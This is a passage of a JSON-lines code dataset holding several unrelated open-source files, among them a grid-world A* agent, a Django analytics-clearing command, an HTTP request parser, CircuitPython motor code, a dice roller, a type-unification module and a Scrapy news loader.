[]\n\n heapq.heappush(oheap, (fscore[start], start))\n\n while oheap:\n current = heapq.heappop(oheap)[1]\n\n if current == goal:\n data = []\n while current in came_from:\n data.append(current)\n current = came_from[current]\n return data\n\n close_set.add(current)\n for i, j in neighbors:\n neighbor = current[0] + i, current[1] + j\n tentative_g_score = gscore[current] + heuristic(current, neighbor)\n if 0 <= neighbor[0] < grid.shape[0]:\n if 0 <= neighbor[1] < grid.shape[1]:\n if grid[neighbor[0]][neighbor[1]] == 2:\n continue\n else:\n continue\n else:\n continue\n\n if neighbor in close_set and tentative_g_score >= gscore.get(neighbor, 0):\n continue\n\n if tentative_g_score < gscore.get(neighbor, 0) or neighbor not in [i[1] for i in oheap]:\n came_from[neighbor] = current\n gscore[neighbor] = tentative_g_score\n fscore[neighbor] = tentative_g_score + heuristic(neighbor, goal)\n heapq.heappush(oheap, (fscore[neighbor], neighbor))\n\n\ndef print_env(state):\n grid = np.copy(state['grid']) \n grid[tuple(state['agent_pos'])] = 9 \n\n for i in range(grid.shape[0]):\n for j in range(grid.shape[1]):\n if grid[i, j] == 1:\n print(colored(\"1\", 'yellow'), end=' ') \n elif grid[i, j] == 9:\n print(colored(\"A\", 'red'), end=' ') \n elif grid[i, j] == 2:\n print(colored(\"2\", 'blue'), end=' ') \n else:\n print(colored(\"0\", 'grey'), end=' ')\n print()\n print(f\"{action}\")\n print(f\"{env.rewards}\")\n print()\n\nclass SimpleAgent:\n def __init__(self, env):\n self.env = env\n\n def act(self, state):\n # Check if agent is standing on a resource and collect it\n if state['grid'][state['agent_pos'][0]][state['agent_pos'][1]] == 1:\n return 'collect'\n\n # Check if agent has at least 3 resources and is standing on an empty square\n if state['resource_count'] >= 3 and state['grid'][state['agent_pos'][0]][state['agent_pos'][1]] == 0:\n return 'build'\n\n # Determine nearest resource\n resource_pos = np.argwhere(state['grid'] == 1)\n if len(resource_pos) > 0:\n distances = np.linalg.norm(resource_pos - state['agent_pos'], axis=1)\n nearest_resource = resource_pos[np.argmin(distances)].tolist()\n path = self.env.a_star(tuple(state['agent_pos']), tuple(nearest_resource), state['grid'])\n if path is not None and len(path) > 0:\n path = list(reversed(path)) # Reverse the path\n next_pos = path[1] if len(path) > 1 else path[0] # Get the next position\n return 'right' if next_pos[1] > state['agent_pos'][1] else 'left' if next_pos[1] < state['agent_pos'][1] else 'down' if next_pos[0] > state['agent_pos'][0] else 'up'\n\n # Determine nearest empty square if no resources left\n empty_pos = np.argwhere(state['grid'] == 0)\n if len(empty_pos) > 0:\n distances = np.linalg.norm(empty_pos - state['agent_pos'], axis=1)\n nearest_empty = empty_pos[np.argmin(distances)].tolist()\n path = self.env.a_star(tuple(state['agent_pos']), tuple(nearest_empty), state['grid'])\n if path is not None and len(path) > 0:\n path = list(reversed(path)) # Reverse the path\n next_pos = path[1] if len(path) > 1 else path[0] # Get the next position\n return 'right' if next_pos[1] > state['agent_pos'][1] else 'left' if next_pos[1] < state['agent_pos'][1] else 'down' if next_pos[0] > state['agent_pos'][0] else 'up'\n\n # No available moves\n return None\n\n\n\n\nif __name__ == \"__main__\":\n env = GridEnvironment()\n agent = SimpleAgent(env)\n\n for episode_idx in range(1):\n state = env.reset()\n done = False\n while not done:\n action = agent.act(state)\n if action is None:\n break\n state, done = env.step(action)\n print_env(state)\n","repo_name":"lblcbc/Collect_Gather_Build","sub_path":"sim_method.py","file_name":"sim_method.py","file_ext":"py","file_size_in_byte":6778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24752576811","text":"import sys\nfrom argparse import ArgumentParser\nfrom typing import Any\n\nfrom django.core.management.base import BaseCommand\n\nfrom analytics.lib.counts import COUNT_STATS, do_drop_single_stat\n\nclass Command(BaseCommand):\n help = \"\"\"Clear analytics tables.\"\"\"\n\n def add_arguments(self, parser: ArgumentParser) -> None:\n parser.add_argument('--force',\n action='store_true',\n help=\"Actually do it.\")\n parser.add_argument('--property',\n type=str,\n help=\"The property of the stat to be cleared.\")\n\n def handle(self, *args: Any, **options: Any) -> None:\n property = options['property']\n if property not in COUNT_STATS:\n print(\"Invalid property: %s\" % (property,))\n sys.exit(1)\n if not options['force']:\n print(\"No action taken. Use --force.\")\n sys.exit(1)\n\n do_drop_single_stat(property)\n","repo_name":"18-2-SKKU-OSS/2018-2-OSS-L5","sub_path":"analytics/management/commands/clear_single_stat.py","file_name":"clear_single_stat.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"26955557691","text":"class HttpRequest(object):\n\n def __init__(self, response):\n # print('浏览器发送过来的请求数据', response)\n data = response.split('\\r\\n')\n # print(data)\n self.FirstLine = data[0]\n self.body = data[1:]\n self.method = self.FirstLine.split(\" \")[0]\n # 带url 和 参数 ,不带端口\n self.full_path = self.FirstLine.split(\" \")[1]\n self.GET = self.full_path.rsplit('?', 1)[-1]\n self.path = self.full_path.split(\"?\")[0]\n # HTTP及版本号\n self.HTTP = self.FirstLine.split(\" \")[2]\n self.HOST = data[1].split(\" \")[-1].split(\":\")[0]\n self.PORT = data[1].split(\" \")[-1].split(\":\")[1]\n\n self.POST = data[-1]\n self.body = data[1:]\n self.META = self.body[:-2]\n self.GET = self.__dic_from_str(self.GET)\n self.POST = self.__dic_from_str(self.POST)\n self.__process_meta()\n self.COOKIES = self.META.get('Cookie', None)\n if self.COOKIES:\n self.COOKIES = self.__dic_from_str(self.COOKIES, seq=\";\")\n\n def __dic_from_str(self, content, seq=\"&\"):\n try:\n lst = content.split(seq)\n dic = {}\n for item in lst:\n a, b = item.strip().split('=', 1)\n dic.update({a: b})\n ret = dic\n except AttributeError:\n ret = {}\n except ValueError:\n ret = {}\n return ret\n\n def __process_meta(self):\n dic = {}\n for item in self.META:\n a, b = item.split(':', 1)\n dic.update({a: b})\n self.META = dic\n","repo_name":"DengJackNo1/web_framework","sub_path":"socket_django/MyWeb_framework/core/http/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35857900363","text":"import time\nfrom busio import I2C\nfrom adafruit_seesaw.seesaw import Seesaw\nfrom adafruit_seesaw.pwmout import PWMOut\nfrom adafruit_motor import motor, servo\nfrom digitalio import DigitalInOut, Direction, Pull\nimport board\n\nprint(\"Mag Neat-o!\")\n\n# Create seesaw object\ni2c = I2C(board.SCL, board.SDA)\nseesaw = Seesaw(i2c)\n\n# Create one motor on seesaw PWM pins 22 & 23\nmotor_a = motor.DCMotor(PWMOut(seesaw, 22), PWMOut(seesaw, 23))\n# Create another motor on seesaw PWM pins 19 & 18\nmotor_b = motor.DCMotor(PWMOut(seesaw, 19), PWMOut(seesaw, 18))\n\n# Create servo object\npwm = PWMOut(seesaw, 17) # Servo 1 is on s.s. pin 17\npwm.frequency = 50 # Servos like 50 Hz signals\nmy_servo = servo.Servo(pwm) # Create my_servo with pwm signa\nmy_servo.angle = 90\n\ndef smooth_move(start, stop, num_steps):\n return [(start + (stop-start)*i/num_steps) for i in range(num_steps)]\n\nbuttona = DigitalInOut(board.BUTTON_A)\nbuttona.direction = Direction.INPUT\nbuttona.pull = Pull.DOWN\n\nbuttonb = DigitalInOut(board.BUTTON_B)\nbuttonb.direction = Direction.INPUT\nbuttonb.pull = Pull.DOWN\n\nswitch = DigitalInOut(board.SLIDE_SWITCH)\nswitch.direction = Direction.INPUT\nswitch.pull = Pull.UP\n\nlast_buttona = buttona.value\nlast_buttonb = buttonb.value\nlast_switch = switch.value\n\nlast_touch1 = False\nlast_touch4 = False\n\n\nwhile True:\n touch_vals = (seesaw.touch_read(0), seesaw.touch_read(3))\n # print(touch_vals)\n\n touch1 = False\n if seesaw.touch_read(0) > 500:\n touch1 = True\n\n if touch1 != last_touch1:\n if touch1:\n start_angle = my_servo.angle\n end_angle = start_angle - 20\n end_angle = max(0, min(end_angle, 180))\n print(\"left from\", start_angle, \"to\", end_angle)\n for a in smooth_move(start_angle, end_angle, 25):\n my_servo.angle = a\n time.sleep(0.03)\n last_touch1 = touch1\n\n touch4 = False\n if seesaw.touch_read(3) > 500:\n touch4 = True\n\n if touch4 != last_touch4:\n if touch4:\n start_angle = my_servo.angle\n end_angle = start_angle + 20\n end_angle = max(0, min(end_angle, 180))\n print(\"right from\", start_angle, \"to\", end_angle)\n for a in smooth_move(start_angle, end_angle, 25):\n my_servo.angle = a\n time.sleep(0.03)\n last_touch4 = touch4\n\n if buttona.value != last_buttona:\n if buttona.value:\n print(\"down\")\n if motor_a.throttle:\n print(\"haulin!\")\n motor_b.throttle = -0.1\n else:\n motor_b.throttle = -0.1\n else:\n motor_b.throttle = 0\n last_buttona = buttona.value\n\n if buttonb.value != last_buttonb:\n if buttonb.value:\n print(\"up\")\n if motor_a.throttle:\n print(\"haulin!\")\n motor_b.throttle = 0.4\n else:\n motor_b.throttle = 0.3\n else:\n motor_b.throttle = 0\n last_buttonb = buttonb.value\n\n if switch.value != last_switch:\n motor_a.throttle = switch.value\n if motor_a.throttle:\n print(\"GRAB\")\n else:\n print(\"RELEASE\")\n last_switch = switch.value\n\n time.sleep(0.01)\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"Crickits/mag_neat_o/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"16235552702","text":"import random\r\nimport argparse\r\nimport re\r\n\r\nhelp =\"\"\"\r\nSimple dice program to evaluate mutli-sided dice, fudge dice and exploding dice.\\n\r\n\r\nUsage:\r\n\r\npython roller.py\r\n\r\ndicenumber = number of rolled dice.\r\nmode = d, f, ! or s.\r\n'd' will output the diceresults.\r\n's' will output the sum of the dicerolls.\r\n'!' will output exploding dice.\r\n'f' is used for fudge dice. Since fudge dice are always the same, the input is f.\r\nnumber of sides = number of sides of the dice.\r\n\r\nexample:\r\n\r\nroller.exe 2s10 - will print the sum of two tensided dice.\r\nroller.exe 3d6 - will print the output of 3 sixsided dice.\r\nroller.exe 20!6 - will print the output of 20 6 sided exploding dice.\r\nroller.exe 6f - will print the output and sum of 6 fudge dice.\r\n\"\"\"\r\n\r\nparser = argparse.ArgumentParser(description=help, formatter_class=argparse.RawDescriptionHelpFormatter)\r\n\r\n\r\nparser.add_argument(\"dice\", type=str)\r\nargs = parser.parse_args()\r\n\r\n#TODO helpfile\r\n# -h, h, /h, --help\r\n\r\n\r\na = re.findall(pattern=\"^\\d+\", string=args.dice)\r\nb = re.findall(pattern=\"\\D\", string=args.dice)\r\nc = re.findall(pattern=\"\\d+$\", string=args.dice)\r\n\r\ndef roll(num):\r\n return random.randrange(1,num + 1)\r\n\r\ndef recrand(x,a=0):\r\n while a%x<1:a+=random.randint(1,x)\r\n return a\r\n\r\nlist = []\r\n\r\nstring = \"\".join(b)\r\n\r\n\r\nif string != 'f':\r\n if string != '!':\r\n for x in range(int(a[0])):\r\n list.append(roll(int(c[0])))\r\n\r\n else:\r\n for x in range(int(a[0])):\r\n list.append(recrand(int(c[0])))\r\n print((str(list)))\r\n\r\n if string == 'd':\r\n seperator = \",\"\r\n print((str(list)))\r\n\r\n elif string == 's!':\r\n sum = 0\r\n for i in list:\r\n if int(i) == int(c[0]):\r\n sum = sum + int(i) + roll(int(c[0]))\r\n else:\r\n sum = sum + int(i)\r\n print(sum)\r\n\r\n elif string == 's!':\r\n sum = 0\r\n print(\"yay\")\r\n for i in list:\r\n if i == c:\r\n sum = sum + int(i) + roll(int(c))\r\n else:\r\n sum = sum + int(i)\r\n print(sum)\r\n\r\n elif string == 's':\r\n sum = 0\r\n for i in list:\r\n sum = sum + int(i)\r\n print(sum)\r\n\r\n\r\nelse:\r\n for x in range(int(a[0])):\r\n list.append(roll(3))\r\n translation = {1: \"+\", 2: \" \", 3: \"-\"}\r\n summe = 0\r\n for x in list:\r\n if x == 1:\r\n summe += 1\r\n elif x == 3:\r\n summe -= 1\r\n else:\r\n pass\r\n for i,x in enumerate(list):\r\n list[i] = translation[x]\r\n print(list)\r\n print(summe)","repo_name":"Psycr0w/DiceRoller","sub_path":"roller.py","file_name":"roller.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71788016792","text":"import gzip\nimport io\nimport unittest\n\nfrom bytesbufio import BytesBufferIO\n\nTEXT = \"Hello world.\\n\"\n\n\nclass BytesBufferIOTest(unittest.TestCase):\n def test_value_available_after_close(self):\n bytesout = BytesBufferIO()\n with io.TextIOWrapper(bytesout, encoding='utf-8') as textout:\n textout.write(TEXT)\n self.assertEqual(TEXT, bytesout.getvalue().decode('utf-8'))\n\n def test_value_available_after_close_with_gzip(self):\n bytesbufio = BytesBufferIO()\n with gzip.open(bytesbufio, mode=\"wt\", encoding='utf-8') as textout:\n textout.write(TEXT)\n with gzip.open(io.BytesIO(bytesbufio.getvalue()), mode=\"rt\") as textin:\n self.assertEqual(TEXT, textin.read())\n","repo_name":"shamp00the-cat/movierecs","sub_path":".venv/lib/python3.11/site-packages/tests/bytes_buffer_io_test.py","file_name":"bytes_buffer_io_test.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"43398965565","text":"from hybridts.type_encoding import *\nfrom hybridts import exc\nfrom collections import defaultdict, ChainMap\nimport typing as t\ntry:\n # noinspection PyUnresolvedReferences\n from hybridts.tc_state import TCState\nexcept ImportError:\n pass\n\n\nclass RowCheckFailed(Exception):\n pass\n\n\nclass StructureKeeper:\n is_finished: bool\n\n def update(self, tcs: 'TCState', path_lhs: Path) -> None:\n raise NotImplementedError\n\n\n# class FlexibleStructureKeeper(StructureKeeper):\n# freshes: t.List[Fresh]\n# vars: t.List[Var]\n# fresh_pathes: t.List[T]\n# var_paths: t.List[T]\n# is_finished: bool\n#\n# def __init__(self, freshes: t.List[Fresh], vars: t.List[Var],\n# fresh_pathes: t.List[T], var_paths: t.List[T]):\n# self.freshes = freshes\n# self.vars = vars\n# self.fresh_pathes = fresh_pathes\n# self.var_paths = var_paths\n# self.is_finished = False\n#\n# def __repr__(self):\n# # TODO\n# return 'FlexibleStructure({!r} = {!r} ~ {!r} = {!r})'.format(\n# self.freshes, self.fresh_pathes, self.vars, self.var_paths)\n#\n# def update(self, tcs: 'TCState', path_lhs: Path) -> None:\n# var_paths = tuple(tcs.path_infer(path)[0] for path in self.var_paths)\n# fresh_paths = tuple(\n# tcs.path_infer(path)[0] for path in self.fresh_pathes)\n#\n# lookup = {k: v for k, v in zip(fresh_paths, self.freshes)}\n#\n# def subst(_, t):\n# return (), lookup.get(t, t)\n#\n# vars_path_tp = Tuple(var_paths)\n# vars_path_tp = pre_visit(subst)((), tcs.infer(vars_path_tp))\n#\n# for var, each in zip(self.vars, vars_path_tp.elts):\n# tcs.unify(var, each)\n#\n# vars_ftv = ftv(vars_path_tp)\n# if not vars_ftv:\n# self.is_finished = True\n# # TODO:\n# # forall a. a -> var\n# # unify with ('i -> 'j) -> ('j -> 'i), where\n# # 'i, 'j are variables,\n# # this certainly can be true, unless\n# # infer(i') != infer('j) and\n# # infer(i') = some non-var and\n# # infer(j') = some non-var\n#\n# else:\n# # fresh_paths_ftv = ftv(Tuple(fresh_paths))\n# # if fresh_paths_ftv.issuperset(vars_ftv):\n# # raise exc.StructureCannotUnify(vars)\n# path_lhs, _ = tcs.path_infer(path_lhs)\n# structures = tcs.get_structures()\n# for fv in ftv(path_lhs):\n# structures[fv].add(self)\n\n# class RigidStructureKeeper(StructureKeeper):\n# template: T\n# path: T\n# is_finished: bool\n#\n# def __init__(self, template: T, path: T):\n# self.template = template\n# self.path = path\n# self.is_finished = False\n#\n# def __repr__(self):\n# return 'RigidStructure({!r} = {!r})'.format(self.template, self.path)\n#\n# def update(self, tcs: 'TCState', path_lhs: Path) -> None:\n# path, _ = tcs.path_infer(self.path)\n# _, structure = fresh_ftv(path)\n#\n# tcs.unify(structure, self.template)\n#\n# if not ftv(tcs.infer(self.template)):\n# self.is_finished = True\n# else:\n# path_lhs, _ = tcs.path_infer(path_lhs)\n# structures = tcs.get_structures()\n# for fv in ftv(path_lhs):\n# structures[fv].add(self)\n\n\ndef update(tcs: 'TCState', bounds, vars, freshed_bounds, freshed_vars) -> None:\n\n left = Tuple(bounds + vars)\n right = Tuple(freshed_bounds + freshed_vars)\n path, _ = tcs.path_infer(right)\n rev_map, structure = fresh_ftv(path)\n tcs.unify(left, structure)\n\n ftv_vars = ftv(tcs.infer(structure))\n if ftv_vars:\n resume = {tcs.infer(v): k for k, v in rev_map.items()}\n for ftv_var in ftv_vars:\n tcs.unify(resume[ftv_var], ftv_var)\n\n\ndef make(self: 'TCState', tctx: TypeCtx,\n structures: t.Dict[Var, t.Set[StructureKeeper]]):\n\n # fresh variables are guaranteed to be not free due to syntax restriction of forall\n # thus, when proceeding unification, freshvar cannot be greater or lesser than\n # any other type except another fresh variable.\n # However, fresh variable can only equal to another by a bidirectional name mapping\n\n structures: t.Dict[Var,\n t.Set[StructureKeeper]] = structures or defaultdict(set)\n self.get_tctx = lambda: tctx\n\n # key => [(template, path)]\n # every time, `path` gets updatd, we fresh all type variables in `path`, which\n # produces a closed new type, and use this unify with `template`\n\n def subst_once(subst_map: t.Dict[T, T], ty):\n return subst_map, subst_map.get(ty, ty)\n\n def subst(subst_map: t.Dict[T, T], ty: T):\n return pre_visit(subst_once)(subst_map, ty)\n\n def occur_in(var: T, ty: T) -> bool:\n if var is ty:\n return False\n\n def visit_func(tt: T):\n return not isinstance(tt, Var) or tt is not var\n\n return not visit_check(visit_func)(ty)\n\n def infer_row(x: Row) -> t.Tuple[t.Optional[Row], Row]:\n if isinstance(x, RowCons):\n field_path, field_t = path_infer(x.field_type)\n tl_path, tl_t = infer_row(x.tail)\n if field_path and tl_path:\n path = RowCons(x.field_name, field_path, tl_path)\n else:\n path = None\n return path, RowCons(x.field_name, field_t, tl_t)\n if isinstance(x, RowMono):\n return None, x\n if isinstance(x, RowPoly):\n path_p, t_p = path_infer(x.type)\n if path_p:\n path = RowPoly(path_p)\n else:\n path = None\n return path, RowPoly(t_p)\n raise TypeError(x)\n\n def path_infer(x: T) -> t.Tuple[t.Optional[Path], T]:\n if isinstance(x, Nom):\n return None, x\n\n if isinstance(x, Var):\n path_end = tctx.get(x)\n if not path_end:\n return x, x\n path_x, end = path_end\n path_y, y = path_infer(end)\n path, end = tctx[x] = (path_y or path_x or x), y\n if x.is_rigid and not isinstance(end, LeafTypes):\n raise exc.RigidTypeExpanding(x)\n\n return path, end\n\n if isinstance(x, Fresh):\n return x, x\n\n if isinstance(x, App):\n f_path, f_t = path_infer(x.f)\n arg_path, arg_t = path_infer(x.arg)\n if f_path and arg_path:\n path = App(f_path, arg_path)\n else:\n path = None\n return path, App(f_t, arg_t)\n if isinstance(x, Arrow):\n ret_path, ret_t = path_infer(x.ret)\n arg_path, arg_t = path_infer(x.arg)\n if ret_path and arg_path:\n path = Arrow(arg_path, ret_path)\n else:\n path = None\n return path, Arrow(arg_t, ret_t)\n if isinstance(x, Implicit):\n arg_path, arg_t = path_infer(x.witness)\n ret_path, ret_t = path_infer(x.type)\n if ret_path and arg_path:\n path = Implicit(arg_path, ret_path)\n else:\n path = None\n return path, Implicit(arg_t, ret_t)\n if isinstance(x, Tuple):\n if not x.elts:\n return None, x\n paths, ts = zip(*map(path_infer, x.elts))\n if all(paths):\n path = Tuple(paths)\n else:\n path = None\n return path, Tuple(ts)\n if isinstance(x, Forall):\n poly_path, poly_t = path_infer(x.poly_type)\n if poly_path:\n path = Forall(x.token, x.fresh_vars, poly_path)\n else:\n path = None\n return path, Forall(x.token, x.fresh_vars, poly_t)\n if isinstance(x, Record):\n path_row, row_t = infer_row(x.row)\n if not path_row:\n path = None\n else:\n path = Record(path_row)\n\n if isinstance(path_row, RowPoly):\n path = path_row.type\n\n if isinstance(row_t, RowPoly):\n type = row_t.type\n else:\n type = Record(row_t)\n\n return path, type\n raise TypeError(x)\n\n def inst_forall_with_structure_preserved(bound_vars: t.Iterable[Fresh],\n polytype: T):\n mapping: t.Dict[T, Var] = {\n b: InternalVar(is_rigid=True)\n for b in bound_vars\n }\n vars: t.Dict[Var, Var] = {}\n chain = ChainMap(vars, mapping)\n # forall a. var -> a\n # forall b. b -> b\n # var -> i\n # j -> j\n _, monotype = fresh_ftv(polytype, chain)\n # lhs, rhs = zip(*mapping.items())\n # assert mapping\n # structure_keeper = RigidStructureKeeper(Tuple(lhs), Tuple(rhs))\n # for each in rhs:\n # structures[each].add(structure_keeper)\n return mapping, vars, monotype\n\n # def inst_with_structure_preserved(type,\n # rigid=False\n # ) -> t.Tuple[t.Dict[T, Var], T]:\n # if isinstance(type, Forall):\n # poly_type = type.poly_type\n # if rigid:\n # mapping: t.Dict[T, Var] = {b: InternalVar(is_rigid=True) for b in type.fresh_vars}\n # _, poly_type = just_fresh_bounds(poly_type, mapping)\n # if mapping:\n # lhs, rhs = zip(*mapping.items())\n # structure_keeper = RigidStructureKeeper(\n # Tuple(lhs), Tuple(rhs))\n # for each in rhs:\n # structures[each].add(structure_keeper)\n # else:\n # mapping: t.Dict[T, Var] = {b: InternalVar(is_rigid=False) for b in type.fresh_vars}\n # _, poly_type = just_fresh_bounds(poly_type, mapping)\n #\n # vars = {}\n # freshes = {}\n # for k, v in mapping.items():\n # if isinstance(k, Var):\n # kv = vars\n # else:\n # assert isinstance(k, Fresh)\n # kv = freshes\n # kv[k] = v\n # if not vars:\n # return mapping, poly_type\n #\n # freshes, fresh_paths = zip(*freshes.items())\n # vars, var_paths = zip(*vars.items())\n # structure_keeper = FlexibleStructureKeeper(\n # list(freshes), list(vars), list(fresh_paths),\n # list(var_paths))\n # for each in mapping.values():\n # structures[each].add(structure_keeper)\n # type = poly_type\n # else:\n # mapping = {}\n # return mapping, type\n\n def inst_without_structure_preserved(type,\n rigid=False\n ) -> t.Tuple[t.Dict[T, Var], T]:\n \"\"\"\n When using this, there should be no free variable in the scope of forall!\n \"\"\"\n if isinstance(type, Forall):\n mapping: t.Dict[T, Var] = {\n b: InternalVar(is_rigid=rigid)\n for b in type.fresh_vars\n }\n type = type.poly_type\n _, type = just_fresh_bounds(type, mapping)\n return mapping, type\n return {}, type\n\n def _unify(lhs: T, rhs: T, path_lhs: Path, path_rhs: Path) -> None:\n if lhs is rhs:\n # Nom, Fresh, Var\n return\n\n if isinstance(lhs, Var):\n if occur_in(lhs, rhs):\n raise exc.IllFormedType(\" a = a -> b\")\n if lhs.is_rigid:\n if not isinstance(rhs, Var):\n raise exc.TypeMismatch(lhs, rhs)\n path_rhs, _ = path_infer(rhs)\n tctx[lhs] = (path_rhs or path_lhs), rhs\n structure_keepers = structures.get(lhs)\n if structure_keepers:\n for structure_keeper in tuple(structure_keepers):\n if structure_keeper.is_finished:\n structure_keepers.remove(structure_keeper)\n continue\n else:\n structure_keeper.update(self, path_lhs)\n return\n\n if isinstance(rhs, Var):\n return _unify(rhs, lhs, path_rhs, path_lhs)\n\n if isinstance(lhs, Forall) and isinstance(rhs, Forall):\n freshes_l, vars_l, l_p = inst_forall_with_structure_preserved(\n lhs.fresh_vars, lhs.poly_type)\n freshes_r, vars_r, r_p = inst_forall_with_structure_preserved(\n rhs.fresh_vars, rhs.poly_type)\n unify(l_p, r_p)\n if vars_l:\n a, b = zip(*freshes_l.items())\n c, d = zip(*vars_l.items())\n update(self, a, c, b, d)\n if vars_r:\n a, b = zip(*freshes_r.items())\n c, d = zip(*vars_r.items())\n update(self, a, c, b, d)\n return\n\n if isinstance(lhs, Implicit) and isinstance(rhs, Implicit):\n unify(lhs.witness, rhs.witness)\n unify(lhs.type, rhs.type)\n return\n\n if isinstance(lhs, Fresh) and isinstance(rhs, Fresh):\n if lhs.token is rhs.token and lhs.name == rhs.name:\n return\n raise exc.TypeMismatch(lhs, rhs)\n if isinstance(lhs, Arrow) and isinstance(rhs, Arrow):\n unify(lhs.arg, rhs.arg)\n unify(lhs.ret, rhs.ret)\n return\n\n if isinstance(lhs, App) and isinstance(rhs, App):\n unify(lhs.f, rhs.f)\n unify(lhs.arg, rhs.arg)\n return\n\n if isinstance(lhs, Tuple) and isinstance(rhs, Tuple):\n for a, b in zip(lhs.elts, rhs.elts):\n unify(a, b)\n return\n\n if isinstance(lhs, Record) and isinstance(rhs, Record):\n m1, ex1 = extract_row(lhs.row)\n m2, ex2 = extract_row(rhs.row)\n common_keys = m1.keys() & m2.keys()\n only_by1 = {k: v for k, v in m1.items() if k not in common_keys}\n only_by2 = {k: v for k, v in m2.items() if k not in common_keys}\n\n for k in common_keys:\n unify(m1[k], m2[k])\n\n def row_check(row1, row2, only_by1, only_by2):\n if row1 is None and row2 is None:\n if only_by1 or only_by2:\n raise RowCheckFailed\n return\n if row2 is None:\n return row_check(row2, row1, only_by2, only_by1)\n if row1 is None:\n # only_by1 == {only_by2 | row2}\n # where\n # only_by1 \\cap only_by2 = \\emptyset,\n # therefore,\n # only_by2 = \\emptyset,\n # row2 = only_by1\n if only_by2:\n raise RowCheckFailed\n return unify(row2, Record(row_of_map(only_by1, empty_row)))\n # {only_by1|row1} == {only_by2|row2},\n # where\n # only_by1 \\cap only_by2 = \\emptyset,\n # therefore,\n # forall type in only_by2. type in row1, and\n # forall type in only_by1. type in row2,\n # therefore,\n # t1 = {only_by1 \\cup only_by2|row} = t2,\n # {only_by1|row} = row2\n # {only_by2|row} = row1\n polyrow = RowPoly(InternalVar(is_rigid=False))\n ex2 = Record(row_of_map(only_by1, polyrow))\n ex1 = Record(row_of_map(only_by2, polyrow))\n unify(row1, ex1)\n unify(row2, ex2)\n\n try:\n return row_check(ex1, ex2, only_by1, only_by2)\n except RowCheckFailed:\n raise exc.TypeMismatch(lhs, rhs)\n raise exc.TypeMismatch(lhs, rhs)\n\n def unify(lhs, rhs):\n\n path_lhs, lhs = path_infer(lhs)\n path_rhs, rhs = path_infer(rhs)\n _unify(lhs, rhs, path_lhs, path_rhs)\n\n def infer(t):\n return path_infer(t)[1]\n\n # self.inst_with_structure_preserved = inst_with_structure_preserved\n def relink(var: Var, t: T):\n tctx[var] = path_infer(t)\n\n self.relink = relink\n self.inst_without_structure_preserved = inst_without_structure_preserved\n self.unify = unify\n self.path_infer = path_infer\n self.occur_in = occur_in\n self.extract_row = extract_row\n self.infer = infer\n self.get_structures = lambda: structures\n","repo_name":"RemuLang/hybrid-type-system","sub_path":"hybridts/tc_make.py","file_name":"tc_make.py","file_ext":"py","file_size_in_byte":16733,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"9626623422","text":"class Rect:\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.bottom = y + height\n self.right = x + width\n\n def x_ratio(self, search):\n if search < self.x:\n return 0\n elif search > self.x + self.width:\n return 1\n else:\n ratio = (search - self.x) / self.width\n return self._approx(ratio, 0.5, 0.1)\n\n def y_ratio(self, search):\n if search < self.y:\n return 0\n elif search > self.y + self.height:\n return 1\n else:\n ratio = (search - self.y) / self.height\n return self._approx(ratio, 0.5, 0.1)\n\n @staticmethod\n def _approx(value, center, delta):\n if abs(value - center) < delta:\n return center\n return value\n\n def to_dict_str(self):\n return {\n \"x\": str(self.x),\n \"y\": str(self.y),\n \"width\": str(self.width),\n \"height\": str(self.height),\n }\n","repo_name":"hbmartin/graphviz2drawio","sub_path":"graphviz2drawio/models/Rect.py","file_name":"Rect.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"5"} +{"seq_id":"37067197931","text":"import re\n\nfrom scrapy.loader.processors import Compose\nfrom scrapy.loader.processors import Join\n\nfrom .base_loader import BaseLoader\n\n\nclass LiberationLoader(BaseLoader):\n \n def clean_date(rawdata):\n date = re.sub(\"[^0-9-]\", \"\", rawdata)\n date = date[0:len(date)-6]\n date = date.replace(\"-\", \"/\")\n date = date.split(\"/\")\n date[2], date[0] = date[0], date[2]\n date = \"/\".join(date)\n return date\n\n def clean_title(rawdata):\n return rawdata[0].replace(\" - Libération\", \"\")\n \n def clean_author(rawdata):\n return rawdata.replace(\" LIBERATION\", \"\")\n\n date_in = Compose(lambda v: v[0], clean_date)\n title_in = Compose(clean_title)\n author_out = Compose(Join(\", \"), clean_author)\n","repo_name":"gbolmier/newspaper-crawler","sub_path":"newspaper_crawler/loaders/liberation_loader.py","file_name":"liberation_loader.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"27046953312","text":"from typing import Sequence\n\n\nclass Solution:\n def imageSmoother(self, img: Sequence[Sequence[int]]) -> Sequence[Sequence[int]]:\n r = len(img)\n c = len(img[0])\n\n def neighbor(x, y):\n ret = []\n for dx in [-1, 0, 1]:\n if 0 <= x + dx < r:\n for dy in [-1, 0, 1]:\n if 0 <= y + dy < c:\n ret.append((x + dx, y + dy))\n return ret\n\n new_image = [[0] * c for _ in range(r)]\n for i in range(r):\n for j in range(c):\n neighbors = neighbor(i, j)\n new_image[i][j] = int(sum(img[x][y] for x, y in neighbors) / len(neighbors))\n return new_image\n","repo_name":"XinweiChai/leetcode_problems","sub_path":"python/problem661.py","file_name":"problem661.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38736713969","text":"# -*- encoding: utf-8 -*-\n\nimport os, time\nfrom time import 